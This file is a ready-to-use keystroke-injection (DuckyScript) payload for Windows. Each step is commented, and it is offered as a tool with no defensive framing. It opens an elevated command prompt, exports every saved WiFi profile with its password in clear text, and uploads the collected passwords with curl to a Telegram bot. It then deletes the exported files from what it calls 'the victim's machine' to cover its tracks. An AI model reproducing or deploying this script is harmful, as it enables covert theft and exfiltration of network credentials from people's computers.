REM           it just for windows                                                  
REM                          ,,,,,,,,,,                        
REM                        , ,,,,,,*****                       
REM                      ,,((*****.@*////                      
REM                     *######(((*//////                      
REM                      *//%%%%%#(****//                      
REM                       **////*//////*    ,,,.,              
REM                     ,,*(((///////(((((*,,,,,,,,            
REM                  ,,,,,,(########(((((*,,,,,,,**            
REM                ,,,,,,,,,*(((//*,,,************/            
REM               ***,,,,,,,,************/////**//             
REM               ********************/////////*////.          
REM               *********////////*******/*/((///            
REM                //(***************///(##((((                
REM                    /(((#########(((((.    



REM The following script will allow us to obtain network names and WiFi passwords and export them via Telegram bot.

REM Wait for 3 seconds.
DELAY 3000

REM Opens the Windows Run prompt.
GUI r
DELAY 100
STRING CMD
DELAY 100
CTRL-SHIFT ENTER
DELAY 1000
LEFTARROW
DELAY 100
ENTER

REM Wait for 2 seconds.
DELAY 2000

REM Change directory to the root directory.
STRING cd/
DELAY 300
ENTER

REM Create a directory named "wifi" in the root directory.
REM This directory will be used to export the network profiles to.
STRING mkdir wifi
DELAY 100
ENTER
DELAY 100

REM Change directory to the "wifi" directory.
STRING cd wifi
DELAY 100
ENTER
DELAY 100

REM Export the network profiles with the passwords in clear text.
REM Each profile will be exported to a separate .xml file, and the files will be concatenated later in the script.
STRING netsh wlan export profile key=clear
DELAY 200
ENTER
DELAY 1000

REM Copy all the .xml files to one .txt file named "wifi.txt".
REM This file will be sent via Telegram bot.
STRING copy *.xml wifi.txt
DELAY 200
ENTER
DELAY 1000

REM Send the "wifi.txt" file via Telegram bot to the specified chat ID.
REM Replace your bot token here <BOT-TOKEN> and chat_id <CHAT-ID>
STRING curl -F chat_id=<CHAT-ID> -F document=@C:\wifi\wifi.txt https://api.telegram.org/bot<TOKEN-BOT>/sendDocument
DELAY 100
ENTER
DELAY 500

REM Delete the "wifi.txt" file.
STRING del wifi.txt
DELAY 150
ENTER
DELAY 100

REM Confirm the deletion of the "wifi.txt" file.
STRING y
DELAY 100
ENTER
DELAY 100

REM Remove the entire "wifi" directory from the victim's machine.
STRING rmdir wifi
DELAY 100
ENTER
DELAY 100

REM Exit the command prompt.
STRING exit
DELAY 100
ENTER
